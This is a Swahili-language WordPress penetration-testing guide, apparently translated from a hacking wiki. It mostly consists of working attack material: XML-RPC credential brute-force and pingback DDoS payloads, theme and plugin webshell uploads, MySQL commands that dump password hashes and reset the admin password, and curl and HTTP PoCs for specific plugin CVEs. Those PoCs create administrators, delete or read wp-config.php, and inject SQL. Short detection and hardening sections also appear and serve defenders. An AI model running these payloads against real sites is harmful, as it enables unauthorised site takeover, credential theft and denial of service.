Wordpress

Reading time: 25 minutes

Taarifa za Msingi

• Faili zilizopakiwa zinaenda kwa: http://10.10.10.10/wp-content/uploads/2018/08/a.txt

• Files za themes zinaweza kupatikana katika /wp-content/themes/, hivyo ukibadilisha baadhi ya php ya theme ili kupata RCE huenda utatumia njia hiyo. Kwa mfano: Ukiotumia theme twentytwelve unaweza kupata faili ya 404.php katika: /wp-content/themes/twentytwelve/404.php

• URL nyingine ambayo inaweza kusaidia ni: /wp-content/themes/default/404.php

• Katika wp-config.php unaweza kupata nenosiri wa root wa database.

• Njia za kuingia za default za kuangalia: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/

Mafaili Makuu ya WordPress

• index.php
• license.txt ina taarifa muhimu kama toleo la WordPress lililowekwa.
• wp-activate.php inatumika kwa mchakato wa kuthibitisha kwa email wakati wa kuanzisha tovuti mpya ya WordPress.
• Folda za login (zinaweza kubadilishwa jina ili kuzijificha):
• /wp-admin/login.php
• /wp-admin/wp-login.php
• /login.php
• /wp-login.php
• xmlrpc.php ni faili inayowakilisha kipengele cha WordPress kinachoruhusu data kutumwa kwa kutumia HTTP kama njia ya usafirishaji na XML kama mbinu ya uandishi. Aina hii ya mawasiliano imebadilishwa na WordPress REST API.
• Folda wp-content ni saraka kuu ambapo plugins na themes zinahifadhiwa.
• wp-content/uploads/ ni saraka ambapo faili zote zilizopakiwa kwenye jukwaa zinahifadhiwa.
• wp-includes/ ni saraka ambapo mafaili ya msingi yanahifadhiwa, kama vyeti, fonti, faili za JavaScript, na widgets.
• wp-sitemap.xml Katika toleo la WordPress 5.5 na zaidi, WordPress huunda faili ya sitemap XML yenye machapisho yote ya umma na aina za posti zinazoweza kuulizwa kwa umma na taxonomies.

Post exploitation

• Faili wp-config.php ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, host ya database, username na nenosiri, authentication keys na salts, na prefix ya jedwali la database. Faili hii ya usanidi pia inaweza kutumika kuwasha mode ya DEBUG, ambayo inaweza kusaidia katika utatuzi wa matatizo.

Ruhusa za Watumiaji

• Administrator
• Editor: Huchapisha na kusimamia machapisho yake na ya wengine
• Author: Huchapisha na kusimamia machapisho yake mwenyewe
• Contributor: Anaandika na kusimamia machapisho yake lakini hawezi kuyachapisha
• Subscriber: Kusoma machapisho na kuhariri profaili yao

Uorodheshaji Pasif

Pata toleo la WordPress

Angalia kama unaweza kupata mafaili /license.txt au /readme.html

Ndani ya msimbo wa chanzo wa ukurasa (mfano kutoka https://wordpress.org/support/article/pages/):

• grep

curl https://victim.com/ | grep 'content="WordPress'

• meta name

• Faili za linki za CSS

• Faili za JavaScript

Pata Plugins

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Pata Mandhari

curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Pata matoleo kwa ujumla

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Active enumeration

Plugins and Themes

Huenda usiweze kupata Plugins and Themes zote zinazowezekana. Ili kugundua zote, utahitaji actively Brute Force a list of Plugins and Themes (kwa bahati nzuri kwetu kuna automated tools ambazo zina orodha hizi).

Users

• ID Brute: Unapata users halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing users IDs:

curl -s -I -X GET http://blog.example.com/?author=1

Kama majibu ni 200 au 30X, hiyo ina maana id ni valid. Ikiwa jibu ni 400, basi id ni invalid.

• wp-json: Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:

curl http://blog.example.com/wp-json/wp/v2/users

Endpoint nyingine ya /wp-json/ ambayo inaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

Note that this endpoint only exposes users that have made a post. Taarifa kuhusu watumiaji pekee ambao wamewezesha kipengele hiki zitatolewa.

Pia kumbuka kwamba /wp-json/wp/v2/pages inaweza leak anwani za IP.

• Login username enumeration: Wakati wa kuingia kwenye /wp-login.php, ujumbe hutofautiana kuonyesha ikiwa username ipo au la.

XML-RPC

Ikiwa xml-rpc.php iko active unaweza kufanya credentials brute-force au kuitumia kuanzisha DoS attacks dhidi ya rasilimali nyingine. (Kwa mfano, unaweza kuautomate mchakato huu kwa kutumia hii).

Ili kuona ikiwa iko active jaribu kufikia /xmlrpc.php na tuma ombi hili:

Angalia

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Credentials Bruteforce

wp.getUserBlogs, wp.getCategories au metaWeblog.getUsersBlogs ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force ya credentials. Ikiwa unaweza kupata yoyote yao, unaweza kutuma kitu kama:

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

Ujumbe "Incorrect username or password" ndani ya 200 code response unapaswa kuonekana ikiwa credentials si sahihi.

Ukikitumia credentials sahihi unaweza kupakia faili. Katika response, path itaonekana (https://gist.github.com/georgestephanis/5681982)

<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

Pia kuna njia ya haraka zaidi ya brute-force credentials kwa kutumia system.multicall kwani unaweza kujaribu credentials kadhaa katika ombi moja:

Kuepuka 2FA

Njia hii imeundwa kwa programu na si kwa watu, na ni ya zamani, kwa hivyo haiungi mkono 2FA. Hivyo, ikiwa una creds halali lakini mlango mkuu umewekwa 2FA, huenda ukaweza kutumia xmlrpc.php kuingia kwa kutumia creds hizo ukiyeuka 2FA. Kumbuka kuwa hutaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado huenda ukaweza kufikia RCE kama Ippsec anavyoelezea katika https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s

DDoS au port scanning

Iwapo unaweza kupata method pingback.ping ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.
Hii inaweza kutumika kuomba maelfu ya tovuti za Wordpress ziweze kupata eneo moja (hivyo kusababisha DDoS katika eneo hilo) au unaweza kuitumia kufanya Wordpress iscan baadhi ya mtandao wa ndani (unaweza kuainisha port yoyote).

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

Ikiwa unapata faultCode yenye thamani kubwa kuliko 0 (17), ina maana bandari iko wazi.

Tazama matumizi ya system.multicall katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha DDoS.

DDoS

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>

wp-cron.php DoS

Faili hii kwa kawaida hupatikana chini ya root ya tovuti ya Wordpress: /wp-cron.php
Wakati faili hii inapofikiwa a "nzito" MySQL query inafanywa, hivyo inaweza kutumiwa na washambuliaji kusababisha DoS.
Aidha, kwa default, the wp-cron.php huitwa kila mara kwenye page load (wakati wowote client anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS).

Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host itakayotekeleza vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha issues).

/wp-json/oembed/1.0/proxy - SSRF

Jaribu kufikia https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net na tovuti ya Worpress inaweza kutuma request kwako.

This is the response when it doesn't work:

SSRF

https://github.com/t0gu/quickpress/blob/master/core/requests.go

Chombo hiki huangalia kama methodName: pingback.ping ipo na kwa path /wp-json/oembed/1.0/proxy na ikiwa ipo, inajaribu kui-exploit.

Automatic Tools

cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"

Pata ufikiaji kwa kubadilisha bit

Zaidi ya shambulio la kweli, hii ni jambo la kushangaza. Katika CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man unaweza kugeuza bit 1 kutoka kwa faili yoyote ya wordpress. Kwa hivyo unaweza kugeuza nafasi 5389 ya faili /var/www/html/wp-includes/user.php ili kufanya NOP kwa operesheni ya NOT (!).

if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(

Paneli RCE

Kurekebisha php kutoka kwenye theme inayotumika (admin credentials needed)

Appearance → Theme Editor → 404 Template (kwa upande wa kulia)

Badilisha yaliyomo kwa php shell:

Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa huo. Katika kesi hii lazima ufikie hapa: http://10.11.1.234/wp-content/themes/twentytwelve/404.php

MSF

Unaweza kutumia:

use exploit/unix/webapp/wp_admin_shell_upload

to get a session.

Plugin RCE

PHP plugin

Inawezekana kupakia faili za .php kama plugin.
Tengeneza php backdoor yako kwa mfano:

Kisha ongeza plugin mpya:

Pakia plugin na bonyeza Install Now:

Bonyeza Procced:

Huenda hii haifanyi chochote dhahiri, lakini ukielekea Media, utaona shell yako imepakiwa:

Fungua na utaona URL ya kutekeleza reverse shell:

Kupakia na kuamsha plugin hatarishi

Njia hii inahusisha usakinishaji wa plugin hatarishi inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo:

1. Plugin Acquisition: Plugin hupatikana kutoka chanzo kama Exploit DB kama here.
2. Plugin Installation:

• Elekea kwenye WordPress dashboard, kisha nenda Dashboard > Plugins > Upload Plugin.
• Pakia faili la zip la plugin uliopakua.

3. Plugin Activation: Baada plugin itakapowekwa kwa mafanikio, lazima iamshwe kupitia dashboard.
4. Exploitation:

• Iwapo plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa na udhaifu.
• Metasploit framework inatoa exploit kwa udhaifu huu. Kwa kuingiza module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikaji usioidhinishwa kwa tovuti.
• Inabainishwa kwamba hii ni mojawapo tu ya njia nyingi za kushambulia tovuti ya WordPress.

Yaliyomo yanajumuisha msaada wa picha unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na haikubaliki bila idhini sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama penetration testing kwa idhini wazi.

For more detailed steps check: https://www.hackingarticles.in/wordpress-reverse-shell/

From XSS to RCE

• WPXStrike: WPXStrike ni script iliyoundwa kuinua udhaifu wa Cross-Site Scripting (XSS) hadi Remote Code Execution (RCE) au udhaifu mwingine muhimu katika WordPress. For more info check this post. Inatoa support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:
• Privilege Escalation: Inaunda user kwenye WordPress.
• (RCE) Custom Plugin (backdoor) Upload: Pakia custom plugin (backdoor) yako kwenye WordPress.
• (RCE) Built-In Plugin Edit: Hariri Built-In Plugins ndani ya WordPress.
• (RCE) Built-In Theme Edit: Hariri Built-In Themes ndani ya WordPress.
• (Custom) Custom Exploits: Custom Exploits kwa Third-Party WordPress Plugins/Themes.

Post Exploitation

Toa majina ya watumiaji na nywila:

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"

Badilisha admin password:

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"

Wordpress Plugins Pentest

Uso wa Mashambulio

Kujua jinsi plugin ya Wordpress inaweza kuonyesha utendaji ni muhimu ili kugundua udhaifu katika utendaji wake. Unaweza kuona jinsi plugin inaweza kuonyesha utendaji katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo dhaifu katika this blog post.

• wp_ajax

Moja ya njia plugin inaweza kufichua functions kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na mende za logic, authorization, au authentication. Zaidi ya hayo, mara nyingi functions hizi zitatumia authentication na authorization kulingana na kuwepo kwa wordpress nonce ambayo mtumiaji yeyote aliye authenticated katika instance ya Wordpress anaweza kuwa nayo (bila kujali role yake).

Hizi ndizo functions zinazoweza kutumika kufichua function katika plugin:

add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));

Matumizi ya nopriv hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasio na uthibitisho).

• REST API

Pia inawezekana kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function register_rest_route:

register_rest_route(
$this->namespace, '/get/', array(
'methods' => WP_REST_Server::READABLE,
'callback' => array($this, 'getData'),
'permission_callback' => '__return_true'
)
);

The permission_callback ni callback kwa function inayothibitisha ikiwa mtumiaji fulani ameidhinishwa kupiga njia ya API.

Ikiwa function ya built-in __return_true inatumika, itapitisha tu ukaguzi wa ruhusa za mtumiaji.

• Ufikiaji wa moja kwa moja wa faili ya php

Kwa kawaida, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kupitia web. Kwa hivyo, endapo plugin itafichua utendaji hatarishi unaoamshwa kwa kuingia tu kwenye faili, utaweza kutumiwa na mtumiaji yeyote.

Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)

Baadhi ya plugins hufanya "trusted header" kama njia fupi kwa integrations za ndani au reverse proxies, kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haifungwi kwa njia ya cryptographic kwa ombi na sehemu ya upstream, mshambuliaji anaweza kuispoof na kufikia njia za REST zilizo na vigezo vya juu kama administrator.

• Athari: kuongezeka kwa ruhusa bila uthibitisho hadi hadhi ya admin kwa kuunda administrator mpya kupitia core users REST route.
• Mfano wa header: X-Wcpay-Platform-Checkout-User: 1 (inamlazimisha user ID 1, kawaida akaunti ya administrator ya kwanza).
• Njia iliyoathiriwa: POST /wp-json/wp/v2/users with an elevated role array.

PoC

POST /wp-json/wp/v2/users HTTP/1.1
Host: <WP HOST>
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
X-Wcpay-Platform-Checkout-User: 1
Content-Length: 114

{"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}

Kwa nini inafanya kazi

• Plugin inachanganya header inayoendeshwa na mteja na hali ya authentication na kuruka ukaguzi wa uwezo.
• Core ya WordPress inatarajia uwezo wa create_users kwa route hii; hack ya plugin inaukwepa kwa kuweka moja kwa moja muktadha wa mtumiaji wa sasa kutoka kwa header.

Viashiria vinavyotarajiwa vya mafanikio

• HTTP 201 na JSON body inayoelezea mtumiaji aliyeundwa.
• Mtumiaji mpya wa admin anaonekana katika wp-admin/users.php.

Orodha ya kugundua

• Tafuta kwa grep getallheaders(), $_SERVER['HTTP_...'], au vendor SDKs zinazosoma custom headers kuweka muktadha wa mtumiaji (mfano, wp_set_current_user(), wp_set_auth_cookie()).
• Kagua REST registrations kwa callbacks zenye vipaumbele ambazo hazina ukaguzi imara wa permission_callback na badala yake zinategemea request headers.
• Tafuta matumizi ya kazi za usimamizi wa watumiaji za core (wp_insert_user, wp_create_user) ndani ya REST handlers ambazo zimefungwa kwa thamani za header pekee.

Kukaza usalama

• Usiweke au kutegemea authentication au authorization kutoka kwa headers zinazodhibitiwa na mteja.
• Ikiwa reverse proxy lazima iingize identity, maliza uaminifu kwenye proxy na ondoa nakala za kuingia (mfano, unset X-Wcpay-Platform-Checkout-User at the edge), kisha pitia token iliyosainiwa na uthibitishe upande wa server.
• Kwa routes za REST zinazofanya vitendo vya vipaumbele, liwa ukaguzi wa current_user_can() na permission_callback kali (USITUMIE __return_true).
• Pendelea auth ya first-party (cookies, application passwords, OAuth) badala ya header “impersonation”.

References: angalia viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.

Ufutaji wa Faili kwa Hiari Bila Uthibitisho kupitia wp_ajax_nopriv (Litho Theme <= 3.0)

Themes na plugins za WordPress mara nyingi huweka wazi handlers za AJAX kupitia hooks wp_ajax_ na wp_ajax_nopriv_. Wakati toleo la nopriv linapotumika callback inafikiwa na wageni wasio na uthibitisho, hivyo kitendo chochote nyeti kinapaswa kutekeleza pia:

1. Ukaguzi wa uwezo (capability check) (mfano current_user_can() au angalau is_user_logged_in()), na
2. Nonce ya CSRF iliyothibitishwa kwa check_ajax_referer() / wp_verify_nonce(), na
3. Usafishaji / uthibitisho mkali wa ingizo.

Theme ya Litho multipurpose (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha Remove Font Family na hatimaye ikaweka msimbo ufuatao (uliosahihishwa):

function litho_remove_font_family_action_data() {
if ( empty( $_POST['fontfamily'] ) ) {
return;
}
$fontfamily = str_replace( ' ', '-', $_POST['fontfamily'] );
$upload_dir = wp_upload_dir();
$srcdir  = untrailingslashit( wp_normalize_path( $upload_dir['basedir'] ) ) . '/litho-fonts/' . $fontfamily;
$filesystem = Litho_filesystem::init_filesystem();

if ( file_exists( $srcdir ) ) {
$filesystem->delete( $srcdir, FS_CHMOD_DIR );
}
die();
}
add_action( 'wp_ajax_litho_remove_font_family_action_data',        'litho_remove_font_family_action_data' );
add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );

Issues introduced by this snippet:

• Unauthenticated access – hook ya wp_ajax_nopriv_ imesajiliwa.
• No nonce / capability check – mtembeleaji yeyote anaweza kufikia endpoint.
• No path sanitisation – mnyororo wa fontfamily unaodhibitiwa na mtumiaji umeunganishwa kwenye path ya filesystem bila kuchuja, kuruhusu classic ../../ traversal.

Exploitation

Mshambulizi anaweza kufuta faili au saraka yoyote chini ya uploads base directory (kwa kawaida <wp-root>/wp-content/uploads/) kwa kutuma ombi moja la HTTP POST:

curl -X POST https://victim.com/wp-admin/admin-ajax.php \
-d 'action=litho_remove_font_family_action_data' \
-d 'fontfamily=../../../../wp-config.php'

Kwa sababu wp-config.php iko nje ya uploads, mfululizo wa ../ mara nne unatosha katika usakinishaji wa chaguo-msingi. Kufuta wp-config.php kunalazimisha WordPress kuingia kwenye installation wizard katika ziara inayofuata, kuiruhusu takeover kamili ya tovuti (mshambuliaji anatoa tu usanidi mpya wa DB na kuunda mtumiaji wa admin).

Malengo mengine yenye athari ni pamoja na faili za plugin/theme .php (kwa kuvunja plugin za usalama) au sheria za .htaccess.

Orodha ya utambuzi

• Kila callback ya add_action( 'wp_ajax_nopriv_...') inayoitisha helper za filesystem (copy(), unlink(), $wp_filesystem->delete(), n.k.).
• Ujunganishaji wa input za mtumiaji zisizochujwa ndani ya paths (angalia $_POST, $_GET, $_REQUEST).
• Kukosekana kwa check_ajax_referer() na current_user_can()/is_user_logged_in().

Kuimarisha usalama

function secure_remove_font_family() {
if ( ! is_user_logged_in() ) {
wp_send_json_error( 'forbidden', 403 );
}
check_ajax_referer( 'litho_fonts_nonce' );

$fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) );
$srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily;

if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) {
wp_send_json_error( 'invalid path', 400 );
}
// … proceed …
}
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' );
//  🔒  NO wp_ajax_nopriv_ registration

Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")

Plugin nyingi hutekeleza kipengele cha "view as role" au temporary role-switching kwa kuhifadhi role(s) za awali katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejeshaji inategemea tu request parameters (mfano, $_REQUEST['reset-for']) na orodha inayohifadhiwa na plugin bila kukagua capabilities na nonce halali, hii inakuwa vertical privilege escalation.

Mfano halisi ulipatikana kwenye Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Tawi la reset liliirejesha roles kulingana na reset-for=<username> ikiwa username ilionekana katika array ya ndani $options['viewing_admin_as_role_are'], lakini halikufanya current_user_can() check wala nonce verification kabla ya kuondoa current roles na kuongeza tena roles zilizohifadhiwa kutoka user meta _asenha_view_admin_as_original_roles:

// Simplified vulnerable pattern
if ( isset( $_REQUEST['reset-for'] ) ) {
$reset_for_username = sanitize_text_field( $_REQUEST['reset-for'] );
$usernames = get_option( ASENHA_SLUG_U, [] )['viewing_admin_as_role_are'] ?? [];

if ( in_array( $reset_for_username, $usernames, true ) ) {
$u = get_user_by( 'login', $reset_for_username );
foreach ( $u->roles as $role ) { $u->remove_role( $role ); }
$orig = (array) get_user_meta( $u->ID, '_asenha_view_admin_as_original_roles', true );
foreach ( $orig as $r ) { $u->add_role( $r ); }
}
}

Kwa nini inaweza kutumiwa

• Inamwamini $_REQUEST['reset-for'] na chaguo la plugin bila idhinisho upande wa server.
• Ikiwa mtumiaji aliwahi kuwa na vibali vya juu vilivyohifadhiwa katika _asenha_view_admin_as_original_roles na baadaye alipunguzwa, anaweza kuviweka tena kwa kufikia njia ya reset.
• Katika deployments zingine, mtumiaji yeyote aliye authenticated anaweza kusababisha reset kwa username mwingine aliyeko bado katika viewing_admin_as_role_are (idhinishaji lililoharibika).

Mahitaji ya shambulio

• Toleo la plugin lenye udhaifu na kipengele kimewezeshwa.
• Akaunti lengwa ina jukumu la juu lililosalia lililohifadhiwa katika user meta kutoka matumizi ya awali.
• Kikao chochote cha authenticated; ukosefu wa nonce/capability katika mtiririko wa reset.

Exploitation (example)

# While logged in as the downgraded user (or any auth user able to trigger the code path),
# hit any route that executes the role-switcher logic and include the reset parameter.
# The plugin uses $_REQUEST, so GET or POST works. The exact route depends on the plugin hooks.
curl -s -k -b 'wordpress_logged_in=...' \
'https://victim.example/wp-admin/?reset-for=<your_username>'

Katika builds zilizo hatarini hii hufuta current roles na kuziweka tena original roles zilizohifadhiwa (mfano, administrator), kwa ufanisi kuongeza privileges.

Detection checklist

• Tafuta vipengele vya role-switching vinavyohifadhi “original roles” katika user meta (mfano, _asenha_view_admin_as_original_roles).
• Tambua reset/restore paths ambazo:
• Soma majina ya watumiaji kutoka $_REQUEST / $_GET / $_POST.
• Badilisha roles kupitia add_role() / remove_role() bila current_user_can() na wp_verify_nonce() / check_admin_referer().
• Ruhusu kwa msingi wa plugin option array (mfano, viewing_admin_as_role_are) badala ya capabilities za actor.

Hardening

• Lazimisha ukaguzi wa capabilities katika kila tawi linalobadilisha state (mfano, current_user_can('manage_options') au kali zaidi).
• Hitaji nonces kwa mabadiliko yote ya role/permission na zithibitishe: check_admin_referer() / wp_verify_nonce().
• Usiwamini kamwe majina ya watumiaji yaliyotolewa ndani ya request; tambua mtumiaji lengwa upande wa server kulingana na mhusika aliyethibitishwa na sera wazi.
• Ghairi uhalali wa hali ya “original roles” wakati wa masasisho ya profile/role ili kuepuka urejeshaji wa kibali cha juu kilichochakaa:

add_action( 'profile_update', function( $user_id ) {
delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
}, 10, 1 );

• Fikiria kuhifadhi state ndogo tu na kutumia token za muda mfupi, zilizo na ulinzi wa capabilities, kwa kubadilisha majukumu kwa muda.

WAF considerations for WordPress/plugin CVEs

Generic edge/server WAFs zimeundwa kwa mifumo ya jumla (SQLi, XSS, LFI). Mengi ya dosari za WordPress/plugin zenye athari kubwa ni bugi za mantiki maalum ya application/uthibitisho (auth) ambazo zinaonekana kama trafiki ya kawaida isipokuwa engine itaelewa routes za WordPress na semantics za plugin.

Offensive notes

• Lenga endpoints maalum za plugin kwa payloads safi: admin-ajax.php?action=..., wp-json/<namespace>/<route>, custom file handlers, shortcodes.
• Jaribu njia zisizothibitishwa kwanza (AJAX nopriv, REST na permissive permission_callback, shortcodes za umma). Payloads za default mara nyingi zinafanikiwa bila obfuscation.
• Mifano ya kawaida zenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.

Defensive notes

• Usitegemee saini za generic za WAF kulinda plugin CVEs. Tekeleza virtual patches maalum kwa layer ya application na aina ya udhaifu au sasisha haraka.
• Pendelea positive-security checks katika code (capabilities, nonces, strict input validation) badala ya vichujio hasi vya regex.

Ulinzi wa WordPress

Sasisho za kawaida

Hakikisha WordPress, plugins, na themes ziko kwenye matoleo ya hivi karibuni. Pia thibitisha kwamba automated updating imewezeshwa katika wp-config.php:

define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );

Pia, weka tu viendelezi na mandhari za WordPress vinavyoweza kuaminika.

Viendelezi vya Usalama

• Wordfence Security
• Sucuri Security
• iThemes Security

Mapendekezo Mengine

• Ondoa mtumiaji wa chaguo-msingi admin
• Tumia nywila zenye nguvu na 2FA
• Kwa vipindi vya kawaida kagua ruhusa za watumiaji
• Punguza majaribio ya kuingia ili kuzuia mashambulizi ya Brute Force
• Badilisha jina la faili wp-admin.php na ruhusu ufikaji tu ndani ya mtandao au kutoka anwani za IP fulani.

SQL Injection isiyothibitishwa kutokana na uhakiki usiofaa (WP Job Portal <= 2.3.2)

Plugin ya ajira WP Job Portal ilifunua kazi ya savecategory ambayo hatimaye inatekeleza msimbo ufuatao wenye udhaifu ndani ya modules/category/model.php::validateFormData():

$category  = WPJOBPORTALrequest::getVar('parentid');
$inquery   = ' ';
if ($category) {
$inquery .= " WHERE parentid = $category ";   // <-- direct concat ✗
}
$query  = "SELECT max(ordering)+1 AS maxordering FROM "
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later

Masuala yaliyoletwa na kipande hiki cha msimbo:

1. Kuingizwa kwa mtumiaji bila kusafishwa – parentid inatoka moja kwa moja kutoka kwenye ombi la HTTP.
2. Uchanganyaji wa kamba ndani ya klauzi ya WHERE – hakuna is_numeric() / esc_sql() / prepared statement.
3. Ufikika bila uthibitisho – ingawa kitendo kinaendeshwa kupitia admin-post.php, ukaguzi pekee uliopo ni CSRF nonce (wp_verify_nonce()), ambao mgeni yeyote anaweza kupata kutoka kwenye ukurasa wa umma unaojumuisha shortcode [wpjobportal_my_resumes].

Exploitation

1. Pata nonce mpya:

curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4

2. Inject arbitrary SQL by abusing parentid:

curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \
-d '_wpnonce=<nonce>' \
-d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id='

Jibu linaonyesha matokeo ya query iliyoungizwa au linabadilisha database, kuthibitisha SQLi.

Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)

Kazi nyingine, downloadcustomfile, iliruhusu wageni kupakua faili yoyote kwenye diski kupitia path traversal. Sink iliyo dhaifu iko katika modules/customfield/model.php::downloadCustomUploadedFile():

$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output

$file_name inadhibitiwa na mshambuliaji na imeunganishwa bila kusafishwa. Tena, kizuizi pekee ni CSRF nonce ambacho kinaweza kupatikana kutoka kwenye ukurasa wa resume.

Utekelezaji wa shambulio

curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'task=downloadcustomfile' \
--data-urlencode '_wpnonce=<nonce>' \
--data-urlencode 'upload_for=resume' \
--data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php'

Seva inajibu na yaliyomo ya wp-config.php, leaking DB credentials and auth keys.

Marejeo

• Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme
• Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin
• Rare Case of Privilege Escalation in ASE Plugin Affecting 100k+ Sites
• ASE 7.6.3 changeset – delete original roles on profile update
• Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses
• WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)
• Hackers exploiting critical WordPress WooCommerce Payments bug